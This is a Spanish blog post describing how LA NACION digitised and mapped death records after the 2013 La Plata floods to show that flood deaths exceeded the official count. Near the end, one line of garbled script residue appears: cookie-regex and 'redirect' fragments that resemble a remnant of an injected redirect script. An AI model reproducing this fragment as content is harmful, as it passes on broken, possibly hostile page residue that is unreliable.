La tragedia de las inundaciones de La Plata

Video más largo

El 2 y 3 de abril de 2013, una inundación de dimensiones considerables tuvo lugar en la ciudad La Plata, Buenos Aires, Argentina. Los gobiernos nacional y provincial fueron fuertemente criticados por no haber actuado adecuadamente durante y después de la tragedia, principalmente debido a que los planes preventivos fueron pospuestos por diferentes razones. La situación luego empeoraría debido a la posición del gobierno nacional en relación a las más de 50 muertes reconocidas oficialmente. La realidad es que nosotros sospechábamos que habían ocurrido más muertes que las que ellos reconocían.

LA NACION tuvo acceso a los registros de los fallecidos en los primeros 15 días posteriores a la tragedia. La información allí contenida fue sistematizada en un modelo de base de datos, tipeada manualmente en hojas de cálculo (los originales estaban escritos a mano), y normalizada, omitiendo información sensible como los nombres.

 

La digitalización de las hojas de cálculo implicó un triple chequeo, primero desde Excel a Google Maps y finalmente desde Google Maps a Google Fusion Tables. La Plata es una ciudad en donde las calles no tienen nombres sino números, dispuestos sin un orden lógico, por lo que tuvimos que geolocalizar cada muerte (más de 150) en un Google Map. Luego de esto exportamos el Kml para subirlo a Google Fusion Tables, cuyo servicio de geocoding no funcionaba con las direcciones aportadas. LA NACION además tuvo acceso a un mapa de las áreas inundadas y de los ríos que corren por la ciudad (naturales y entubados). Pero ese mapa era una imagen, no teníamos la data en crudo.

Superpusimos entonces los mapas para poder identificar cada víctima en relación a las zonas inundadas, comprobando de esa forma nuestra hipótesis de que habían ocurrido más muertes que las reconocidas oficialmente.

Para el geocoding web fueron utilizadas dos imágenes JPG (provistas por dos organismos no gubernamentales) sobre un layout de Google Fusion Tables (técnica “warping”). A su vez el programador utilizó mapwarper.net (un código abierto con herramientas gratuitas) y gdal2tiles.py.

Desde documentos escritos a mano, hacia un excel y hasta gráficos interactivos.

Además del mapeo para lograr mayor impacto visual, los certificados de muerte ingresados en las hojas de cálculo nos permitieron ordenar, categorizar y filtrar las fechas, la hora, las causas de muerte, las profesiones y la edad de los fallecidos, para de esa forma graficar la información y reforzar nuestra hipótesis de que, de las 145 muertes ocurridas entre el 1 y el 15 de abril, eran más de 54 las que habían tenido lugar debido a la inundación.

Este es el Tableau interactivo con gráficos

El impacto de la noticia

Al día siguiente de publicada la nota “La Plata: sospechan de otras 90 muertes ocurridas durante la inundación”, fue publicado un artículo relacionado a las repercusiones: “Un juez de La Plata confirmó 60 muertes oficiales ocurridas a causa de la inundación”. 45 días después se sucedió un nuevo título: “78 muertes se relacionan con las inundaciones de La Plata”.

“; )”\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));”;,”redirect”);>,;”””; ; “”)}

Publicada el
Categorizado como DATA, ESPAÑOL

Por Inés Pujana

Periodista, curiosa incansable y amante del aire libre y de todo lo verde, un buen día me enamoré de las plantas, y hasta la fecha las considero mi cable a tierra y uno de mis hobbys preferidos.